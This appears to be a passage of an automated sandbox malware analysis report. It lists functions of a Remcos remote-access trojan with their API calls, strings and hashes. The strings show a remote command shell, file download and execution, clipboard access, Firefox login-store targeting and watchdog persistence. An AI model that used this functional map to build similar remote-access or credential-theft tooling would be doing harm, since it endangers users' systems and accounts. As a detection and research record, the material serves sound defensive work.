                                                  • Opcode Fuzzy Hash: 1eb4f256e7c4e0b4dee7f2b7c001ffdd8c026b266bbfd6c5aa47d90a079f9e5b
                                                  • Instruction Fuzzy Hash: 09D02B31BC1328B6C51032955C03BD9B6048B00FF7F002067FF0C61283899E592082DE
                                                  Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: @
                                                  • API String ID: 1890195054-2766056989
                                                  • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                  • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                  • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                  Function 0044F199 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                  • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CodeInfoPageValid
                                                  • String ID:
                                                  • API String ID: 546120528-0
                                                  • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                  • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                  • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                  • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                  Function 0044EFD8 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                    • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                    • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                  • _free.LIBCMT ref: 0044F050
                                                  • _free.LIBCMT ref: 0044F086
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast_abort
                                                  • String ID:
                                                  • API String ID: 2991157371-0
                                                  • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                  • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                  • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                                  • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                  Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                  • String ID:
                                                  • API String ID: 2279764990-0
                                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                  Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00446227
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • HeapReAlloc.KERNEL32(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocAllocate_free
                                                  • String ID:
                                                  • API String ID: 2447670028-0
                                                  • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                  • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                  • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                  Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEventStartupsocket
                                                  • String ID:
                                                  • API String ID: 1953588214-0
                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                  Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                  • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                  Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$ForegroundText
                                                  • String ID:
                                                  • API String ID: 29597999-0
                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                  Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                  • String ID:
                                                  • API String ID: 806969131-0
                                                  • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                  • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                  • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                  • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                  Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alldvrm
                                                  • String ID:
                                                  • API String ID: 65215352-0
                                                  • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                  • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                  • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                  • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                  Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                  Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Startup
                                                  • String ID:
                                                  • API String ID: 724789610-0
                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                  Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                  Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725

                                                  Non-executed Functions

                                                  Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                  • API String ID: 1067849700-181434739
                                                  • Opcode ID: 525c82cf253424383d53afec60f00d0c7e4333a727c0b67124ecdb70083fba75
                                                  • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                  • Opcode Fuzzy Hash: 525c82cf253424383d53afec60f00d0c7e4333a727c0b67124ecdb70083fba75
                                                  • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                  Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  • Opcode ID: 3f8c7c636202816c2c11d9cf35dc12d910b9bbdea75ae11c05985bab9112004b
                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                  • Opcode Fuzzy Hash: 3f8c7c636202816c2c11d9cf35dc12d910b9bbdea75ae11c05985bab9112004b
                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                  Function 00412132 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32 ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-13974260
                                                  • Opcode ID: a84fe4f07263c1b716b096cd3ef7e5cd4a534e1cc9e4828f86ce855d413ee268
                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                  • Opcode Fuzzy Hash: a84fe4f07263c1b716b096cd3ef7e5cd4a534e1cc9e4828f86ce855d413ee268
                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                  Function 0040BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  Function 004168FC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32 ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@
                                                  • API String ID: 3520204547-604454484
                                                  • Opcode ID: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                  • Opcode Fuzzy Hash: 257326ec153dacac18454150c5240309e865c30b0bc4197c45747697bab63ef0
                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
